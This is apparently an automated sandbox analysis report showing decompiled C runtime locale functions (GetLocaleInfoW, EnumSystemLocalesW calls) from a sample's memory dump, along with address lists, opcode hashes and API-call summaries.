                                                0x00c2a3b4
                                                0x00c2a3b6
                                                0x00000000
                                                0x00c2a3b8
                                                0x00c2a3b8
                                                0x00c2a3ba
                                                0x00c2a3bc
                                                0x00000000
                                                0x00000000
                                                0x00c2a3bc
                                                0x00c2a3b6
                                                0x00c2a3c6
                                                0x00c2a3ce
                                                0x00c2a3d4
                                                0x00c2a3d5
                                                0x00c2a3d7
                                                0x00c2a3df
                                                0x00c2a3e5
                                                0x00c2a3eb
                                                0x00c2a3f1
                                                0x00c2a405
                                                0x00c2a40a
                                                0x00c2a415
                                                0x00c2a42b
                                                0x00c2a42d
                                                0x00c2a430
                                                0x00c2a453
                                                0x00c2a453
                                                0x00c2a455
                                                0x00c2a458
                                                0x00c2a45e
                                                0x00c2a45e
                                                0x00c2a464
                                                0x00c2a46a
                                                0x00c2a470
                                                0x00c2a476
                                                0x00c2a47c
                                                0x00c2a49d
                                                0x00c2a4a2
                                                0x00c2a4a7
                                                0x00c2a4ab
                                                0x00c2a4b1
                                                0x00c2a4b4
                                                0x00c2a4c7
                                                0x00c2a4c7
                                                0x00c2a4d5
                                                0x00c2a4da
                                                0x00c2a4dd
                                                0x00c2a4e3
                                                0x00c2a4e5
                                                0x00c2a543
                                                0x00c2a549
                                                0x00c2a551
                                                0x00c2a556
                                                0x00c2a55c
                                                0x00c2a55d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2a4b6
                                                0x00c2a4b6
                                                0x00c2a4b9
                                                0x00c2a4bb
                                                0x00000000
                                                0x00c2a4bd
                                                0x00c2a4bd
                                                0x00c2a4c0
                                                0x00000000
                                                0x00c2a4c2
                                                0x00c2a4c2
                                                0x00c2a4c5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2a4c5
                                                0x00c2a4c0
                                                0x00c2a4bb
                                                0x00c2a55f
                                                0x00c2a560
                                                0x00000000
                                                0x00c2a4e7
                                                0x00c2a4e7
                                                0x00c2a4ed
                                                0x00c2a4f5
                                                0x00c2a4fa
                                                0x00c2a4fa
                                                0x00c2a509
                                                0x00c2a509
                                                0x00c2a511
                                                0x00c2a517
                                                0x00c2a51d
                                                0x00c2a524
                                                0x00c2a527
                                                0x00c2a529
                                                0x00c2a539
                                                0x00c2a53e
                                                0x00000000
                                                0x00c2a432
                                                0x00c2a432
                                                0x00c2a443
                                                0x00c2a443
                                                0x00c2a566
                                                0x00c2a566
                                                0x00c2a56d
                                                0x00c2a56e
                                                0x00c2a576
                                                0x00c2a57b
                                                0x00c2a57c
                                                0x00c2a38e
                                                0x00c2a391
                                                0x00c2a393
                                                0x00c2a3a8
                                                0x00000000
                                                0x00c2a395
                                                0x00c2a395
                                                0x00c2a39b
                                                0x00c2a3a0
                                                0x00c2a393
                                                0x00c2a581
                                                0x00c2a582
                                                0x00c2a584
                                                0x00c2a58b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2a2d6
                                                0x00c2a2a9
                                                0x00c2a2ab
                                                0x00c2a2ac
                                                0x00c2a2ae
                                                0x00c2a2ae

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba5ff7fc71c06fc10560c89f4e6791659f58049e5f92d0550f4300c7a8ba0df0
                                                • Instruction ID: 6a7ad68f32e68b9b4e196c04791e27576f39d2164ce7fa004717b544958224dd
                                                • Opcode Fuzzy Hash: ba5ff7fc71c06fc10560c89f4e6791659f58049e5f92d0550f4300c7a8ba0df0
                                                • Instruction Fuzzy Hash: 4641C1B5804229AFDB24DF69DC89AEEBBB8EF55300F1442D9E45DD3211DA359E809F10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E00C2D463(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                				signed int _v8;
                                                				short _v248;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t15;
                                                				signed int _t21;
                                                				signed int _t23;
                                                				signed int _t30;
                                                				signed int _t31;
                                                				void* _t32;
                                                				signed int _t41;
                                                				signed int* _t47;
                                                				int _t49;
                                                				signed int _t50;
                                                
                                                				_t46 = __edx;
                                                				_t15 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t15 ^ _t50;
                                                				_t32 = E00C23663(__ecx, __edx);
                                                				_t47 =  *(E00C23663(__ecx, __edx) + 0x34c);
                                                				_t49 = E00C2D538(_a4);
                                                				asm("sbb ecx, ecx");
                                                				_t21 = GetLocaleInfoW(_t49, ( ~( *(_t32 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                                                				if(_t21 != 0) {
                                                					_t23 = E00C29CB4(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
                                                					_t41 =  *(_t32 + 0x60);
                                                					__eflags = _t23;
                                                					if(_t23 != 0) {
                                                						__eflags = _t41;
                                                						if(_t41 == 0) {
                                                							__eflags =  *((intOrPtr*)(_t32 + 0x5c)) - _t41;
                                                							if( *((intOrPtr*)(_t32 + 0x5c)) != _t41) {
                                                								_t30 = E00C29CB4(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
                                                								__eflags = _t30;
                                                								if(__eflags == 0) {
                                                									_push(_t47);
                                                									_push(_t30);
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						__eflags = _t41;
                                                						if(__eflags != 0) {
                                                							L10:
                                                							 *_t47 =  *_t47 | 0x00000004;
                                                							__eflags =  *_t47;
                                                							_t47[1] = _t49;
                                                							_t47[2] = _t49;
                                                						} else {
                                                							_push(_t47);
                                                							_push(1);
                                                							L9:
                                                							_push(_t49);
                                                							_t31 = E00C2D68F(__eflags);
                                                							__eflags = _t31;
                                                							if(_t31 != 0) {
                                                								goto L10;
                                                							}
                                                						}
                                                					}
                                                					_t27 =  !( *_t47 >> 2) & 0x00000001;
                                                					__eflags =  !( *_t47 >> 2) & 0x00000001;
                                                				} else {
                                                					 *_t47 =  *_t47 & _t21;
                                                					_t27 = _t21 + 1;
                                                				}
                                                				return E00C17193(_t27, _t32, _v8 ^ _t50, _t46, _t47, _t49);
                                                			}



















                                                0x00c2d463
                                                0x00c2d46e
                                                0x00c2d475
                                                0x00c2d483
                                                0x00c2d48b
                                                0x00c2d49a
                                                0x00c2d4a6
                                                0x00c2d4b7
                                                0x00c2d4bf
                                                0x00c2d4d0
                                                0x00c2d4d7
                                                0x00c2d4da
                                                0x00c2d4dc
                                                0x00c2d4e7
                                                0x00c2d4e9
                                                0x00c2d4eb
                                                0x00c2d4ee
                                                0x00c2d4fa
                                                0x00c2d501
                                                0x00c2d503
                                                0x00c2d505
                                                0x00c2d506
                                                0x00000000
                                                0x00c2d506
                                                0x00c2d503
                                                0x00c2d4ee
                                                0x00c2d4de
                                                0x00c2d4de
                                                0x00c2d4e0
                                                0x00c2d514
                                                0x00c2d514
                                                0x00c2d514
                                                0x00c2d517
                                                0x00c2d51a
                                                0x00c2d4e2
                                                0x00c2d4e2
                                                0x00c2d4e3
                                                0x00c2d507
                                                0x00c2d507
                                                0x00c2d508
                                                0x00c2d510
                                                0x00c2d512
                                                0x00000000
                                                0x00000000
                                                0x00c2d512
                                                0x00c2d4e0
                                                0x00c2d524
                                                0x00c2d524
                                                0x00c2d4c1
                                                0x00c2d4c1
                                                0x00c2d4c3
                                                0x00c2d4c3
                                                0x00c2d535

                                                APIs
                                                  • Part of subcall function 00C23663: GetLastError.KERNEL32(?,?,?,00C1BE2E,?,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23668
                                                  • Part of subcall function 00C23663: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23706
                                                  • Part of subcall function 00C23663: _free.LIBCMT ref: 00C236C5
                                                  • Part of subcall function 00C23663: _free.LIBCMT ref: 00C236FB
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C2D4B7
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast_free$InfoLocale
                                                • String ID:
                                                • API String ID: 2003897158-0
                                                • Opcode ID: 1762d4d8e904132d461095a287bba1f7405ce1e791ec4e06a3eab5131bbde45e
                                                • Instruction ID: 782e5bbd6d2cdbdfc4203239bdc3db3760ff7f9be650d65b1c5753995af3fda9
                                                • Opcode Fuzzy Hash: 1762d4d8e904132d461095a287bba1f7405ce1e791ec4e06a3eab5131bbde45e
                                                • Instruction Fuzzy Hash: 8F219572614226ABDB289B29EC42FBA73ACEF55314F10407AFD17C6541EB74EE40DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E00C2D0EA(void* __ecx, void* __edx, void* __eflags, signed int* _a4) {
                                                				void* __ebp;
                                                				intOrPtr _t26;
                                                				intOrPtr _t29;
                                                				signed int _t32;
                                                				signed char _t33;
                                                				signed char _t34;
                                                				intOrPtr* _t38;
                                                				intOrPtr* _t41;
                                                				signed int _t47;
                                                				void* _t50;
                                                				void* _t51;
                                                				signed int* _t52;
                                                				void* _t53;
                                                				signed int _t62;
                                                
                                                				_t53 = E00C23663(__ecx, __edx);
                                                				_t47 = 2;
                                                				_t38 =  *((intOrPtr*)(_t53 + 0x50));
                                                				_t50 = _t38 + 2;
                                                				do {
                                                					_t26 =  *_t38;
                                                					_t38 = _t38 + _t47;
                                                				} while (_t26 != 0);
                                                				_t41 =  *((intOrPtr*)(_t53 + 0x54));
                                                				 *(_t53 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
                                                				_t51 = _t41 + 2;
                                                				do {
                                                					_t29 =  *_t41;
                                                					_t41 = _t41 + _t47;
                                                				} while (_t29 != 0);
                                                				_t52 = _a4;
                                                				 *(_t53 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
                                                				_t52[1] = 0;
                                                				if( *(_t53 + 0x60) == 0) {
                                                					_t47 = E00C2D1E4( *((intOrPtr*)(_t53 + 0x50)));
                                                				}
                                                				 *(_t53 + 0x5c) = _t47;
                                                				_t32 = EnumSystemLocalesW(E00C2D210, 1);
                                                				_t62 =  *_t52 & 0x00000007;
                                                				asm("bt ecx, 0x9");
                                                				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
                                                				asm("bt ecx, 0x8");
                                                				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
                                                				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
                                                					 *_t52 = 0;
                                                					return _t34;
                                                				}
                                                				return _t34;
                                                			}

















                                                0x00c2d0f7
                                                0x00c2d0fd
                                                0x00c2d0fe
                                                0x00c2d101
                                                0x00c2d104
                                                0x00c2d104
                                                0x00c2d107
                                                0x00c2d109
                                                0x00c2d117
                                                0x00c2d11d
                                                0x00c2d120
                                                0x00c2d123
                                                0x00c2d123
                                                0x00c2d126
                                                0x00c2d128
                                                0x00c2d131
                                                0x00c2d13c
                                                0x00c2d13f
                                                0x00c2d145
                                                0x00c2d150
                                                0x00c2d150
                                                0x00c2d159
                                                0x00c2d15c
                                                0x00c2d164
                                                0x00c2d16a
                                                0x00c2d16e
                                                0x00c2d173
                                                0x00c2d177
                                                0x00c2d17c
                                                0x00c2d17e
                                                0x00000000
                                                0x00c2d17e
                                                0x00c2d184

                                                APIs
                                                  • Part of subcall function 00C23663: GetLastError.KERNEL32(?,?,?,00C1BE2E,?,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23668
                                                  • Part of subcall function 00C23663: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23706
                                                • EnumSystemLocalesW.KERNEL32(00C2D210,00000001,00000000,?,-00000050,?,00C2D83E,00000000,?,?,?,00000055,?), ref: 00C2D15C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                • Opcode ID: ff0ab58177042b5f3240a8691f8a30aa09d30010923cd77f0c58660caf9c60f4
                                                • Instruction ID: d9ad0ea17a05ca0fd789a68420271d421b4bf0a928bdf14078d0103a234de648
                                                • Opcode Fuzzy Hash: ff0ab58177042b5f3240a8691f8a30aa09d30010923cd77f0c58660caf9c60f4
                                                • Instruction Fuzzy Hash: 531106372003119FDB189F3898916BEB791FB90368B18442CE95787E40D775B952CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00C2D68F(void* __eflags, signed int _a4, intOrPtr _a8) {
                                                				short _v8;
                                                				void* __ecx;
                                                				void* __ebp;
                                                				void* _t8;
                                                				void* _t11;
                                                				intOrPtr _t13;
                                                				void* _t15;
                                                				void* _t19;
                                                				void* _t21;
                                                				void* _t23;
                                                				signed int _t26;
                                                				intOrPtr* _t28;
                                                
                                                				_push(_t15);
                                                				_t8 = E00C23663(_t15, _t21);
                                                				_t26 = _a4;
                                                				_t23 = _t8;
                                                				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
                                                					L7:
                                                					_t11 = 0;
                                                				} else {
                                                					if(_t26 == _v8 || _a8 == 0) {
                                                						L6:
                                                						_t11 = 1;
                                                					} else {
                                                						_t28 =  *((intOrPtr*)(_t23 + 0x50));
                                                						_t19 = _t28 + 2;
                                                						do {
                                                							_t13 =  *_t28;
                                                							_t28 = _t28 + 2;
                                                						} while (_t13 != 0);
                                                						if(E00C2D1E4( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
                                                							goto L7;
                                                						} else {
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t11;
                                                			}















                                                0x00c2d694
                                                0x00c2d697
                                                0x00c2d69c
                                                0x00c2d69f
                                                0x00c2d6c3
                                                0x00c2d6f7
                                                0x00c2d6f7
                                                0x00c2d6c5
                                                0x00c2d6c8
                                                0x00c2d6f2
                                                0x00c2d6f4
                                                0x00c2d6d0
                                                0x00c2d6d0
                                                0x00c2d6d3
                                                0x00c2d6d6
                                                0x00c2d6d6
                                                0x00c2d6d9
                                                0x00c2d6dc
                                                0x00c2d6f0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2d6f0
                                                0x00c2d6c8
                                                0x00c2d6fc

                                                APIs
                                                  • Part of subcall function 00C23663: GetLastError.KERNEL32(?,?,?,00C1BE2E,?,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23668
                                                  • Part of subcall function 00C23663: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23706
                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00C2D42C,00000000,00000000,?), ref: 00C2D6BB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale
                                                • String ID:
                                                • API String ID: 3736152602-0
                                                • Opcode ID: 57e127108649427aa3f8a218a9f932366a732a702531f5e7d83c7245fccea2df
                                                • Instruction ID: ddf913c33633f17b4bb7212033cfca4e1148b7712bbd011d7d02c76b78f56158
                                                • Opcode Fuzzy Hash: 57e127108649427aa3f8a218a9f932366a732a702531f5e7d83c7245fccea2df
                                                • Instruction Fuzzy Hash: 73F0F932A10532BFDB285A65EC06BBA7B68FB50754F144825FC1BA3940EA74FF01CAD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C2D185(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
                                                				void* __ebp;
                                                				intOrPtr _t11;
                                                				signed char* _t15;
                                                				intOrPtr* _t19;
                                                				intOrPtr _t24;
                                                				void* _t25;
                                                				void* _t26;
                                                
                                                				_t26 = E00C23663(__ecx, __edx);
                                                				_t24 = 2;
                                                				_t19 =  *((intOrPtr*)(_t26 + 0x50));
                                                				_t25 = _t19 + 2;
                                                				do {
                                                					_t11 =  *_t19;
                                                					_t19 = _t19 + _t24;
                                                				} while (_t11 != 0);
                                                				_t4 = _t19 - _t25 >> 1 == 3;
                                                				 *(_t26 + 0x60) = 0 | _t4;
                                                				if(_t4 != 0) {
                                                					_t24 = E00C2D1E4( *((intOrPtr*)(_t26 + 0x50)));
                                                				}
                                                				 *((intOrPtr*)(_t26 + 0x5c)) = _t24;
                                                				EnumSystemLocalesW(E00C2D463, 1);
                                                				_t15 = _a4;
                                                				if(( *_t15 & 0x00000004) == 0) {
                                                					 *_t15 = 0;
                                                					return _t15;
                                                				}
                                                				return _t15;
                                                			}










                                                0x00c2d192
                                                0x00c2d198
                                                0x00c2d199
                                                0x00c2d19c
                                                0x00c2d19f
                                                0x00c2d19f
                                                0x00c2d1a2
                                                0x00c2d1a4
                                                0x00c2d1b2
                                                0x00c2d1b5
                                                0x00c2d1b8
                                                0x00c2d1c3
                                                0x00c2d1c3
                                                0x00c2d1cc
                                                0x00c2d1cf
                                                0x00c2d1d5
                                                0x00c2d1db
                                                0x00c2d1dd
                                                0x00000000
                                                0x00c2d1dd
                                                0x00c2d1e3

                                                APIs
                                                  • Part of subcall function 00C23663: GetLastError.KERNEL32(?,?,?,00C1BE2E,?,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23668
                                                  • Part of subcall function 00C23663: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23706
                                                • EnumSystemLocalesW.KERNEL32(00C2D463,00000001,?,?,-00000050,?,00C2D802,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00C2D1CF
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                • Opcode ID: bbe0a57be1088670a7dd5bbfc154238d886cc358b70bd22aef12a3815e56801a
                                                • Instruction ID: 82540d16248773cfe17d0fc739114bb3dec082bf7dc9d1e336e573803b6ddd61
                                                • Opcode Fuzzy Hash: bbe0a57be1088670a7dd5bbfc154238d886cc358b70bd22aef12a3815e56801a
                                                • Instruction Fuzzy Hash: 1AF022363003146FDB186F39A881B6A7B91EB80768F09402CF9064BE90C2B1AD01CA40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E00C25241(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr _t17;
                                                				signed int _t29;
                                                				void* _t31;
                                                
                                                				_push(0xc);
                                                				_push(0xc40ed0);
                                                				E00C17D30(__ebx, __edi, __esi);
                                                				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
                                                				E00C1DA7C( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
                                                				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
                                                				 *0xc99728 = E00C20782( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
                                                				_t29 = EnumSystemLocalesW(E00C25234, 1);
                                                				_t17 =  *0xc42014; // 0x4fdfcf70
                                                				 *0xc99728 = _t17;
                                                				 *(_t31 - 0x1c) = _t29;
                                                				 *(_t31 - 4) = 0xfffffffe;
                                                				E00C252B1();
                                                				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
                                                				return _t29;
                                                			}






                                                0x00c25241
                                                0x00c25243
                                                0x00c25248
                                                0x00c2524d
                                                0x00c25256
                                                0x00c2525c
                                                0x00c2526d
                                                0x00c2527f
                                                0x00c25281
                                                0x00c25286
                                                0x00c2528b
                                                0x00c2528e
                                                0x00c25295
                                                0x00c2529f
                                                0x00c252ab

                                                APIs
                                                  • Part of subcall function 00C1DA7C: EnterCriticalSection.KERNEL32(?,?,00C205D0,00000000,00C40CF0,0000000C,00C20597,?,?,00C22F75,?,?,00C23805,00000001,00000364,00000005), ref: 00C1DA8B
                                                • EnumSystemLocalesW.KERNEL32(00C25234,00000001,00C40ED0,0000000C,00C2565F,00000000), ref: 00C25279
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                • String ID:
                                                • API String ID: 1272433827-0
                                                • Opcode ID: 6bc445fd6e08e4b9dadab894f2a17b2dc878bb4d5c37c678c33d95d9ff363f7c
                                                • Instruction ID: 2f59e3062bb00da1e73409f9ecae299e16aef67135f742f6d32572ef5243010c
                                                • Opcode Fuzzy Hash: 6bc445fd6e08e4b9dadab894f2a17b2dc878bb4d5c37c678c33d95d9ff363f7c
                                                • Instruction Fuzzy Hash: 63F04972A10214DFEB04EF98E846B9D77F0FB09721F10416AF511AB2A1CB765940EF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C2D09F(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
                                                				void* __ebp;
                                                				intOrPtr _t9;
                                                				signed char* _t13;
                                                				intOrPtr* _t15;
                                                				void* _t19;
                                                				void* _t21;
                                                
                                                				_t19 = E00C23663(__ecx, __edx);
                                                				_t15 =  *((intOrPtr*)(_t19 + 0x54));
                                                				_t21 = _t15 + 2;
                                                				do {
                                                					_t9 =  *_t15;
                                                					_t15 = _t15 + 2;
                                                				} while (_t9 != 0);
                                                				 *(_t19 + 0x64) = 0 | _t15 - _t21 >> 0x00000001 == 0x00000003;
                                                				EnumSystemLocalesW(0xc2cff8, 1);
                                                				_t13 = _a4;
                                                				if(( *_t13 & 0x00000004) == 0) {
                                                					 *_t13 = 0;
                                                					return _t13;
                                                				}
                                                				return _t13;
                                                			}









                                                0x00c2d0ab
                                                0x00c2d0af
                                                0x00c2d0b2
                                                0x00c2d0b5
                                                0x00c2d0b5
                                                0x00c2d0b8
                                                0x00c2d0bb
                                                0x00c2d0d3
                                                0x00c2d0d6
                                                0x00c2d0dc
                                                0x00c2d0e2
                                                0x00c2d0e4
                                                0x00000000
                                                0x00c2d0e4
                                                0x00c2d0e9

                                                APIs
                                                  • Part of subcall function 00C23663: GetLastError.KERNEL32(?,?,?,00C1BE2E,?,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23668
                                                  • Part of subcall function 00C23663: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23706
                                                • EnumSystemLocalesW.KERNEL32(00C2CFF8,00000001,?,?,?,00C2D860,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C2D0D6
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                • Opcode ID: 33968adb9940583c431a0cd092080df5ce235b80838cda0f79862d6188c39fcf
                                                • Instruction ID: a0248a511d0766ce0821563f8a9f3149195d6b466eed83dc8e864d76fe02bd0f
                                                • Opcode Fuzzy Hash: 33968adb9940583c431a0cd092080df5ce235b80838cda0f79862d6188c39fcf
                                                • Instruction Fuzzy Hash: 48F0553630025557CB08AF39E889B6E7F94EFC2760F0A4058FA1A8BAA0C2759943C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00C224AA,?,20001004,00000000,00000002,?,?,00C21AB7), ref: 00C25797
                                                Memory Dump Source
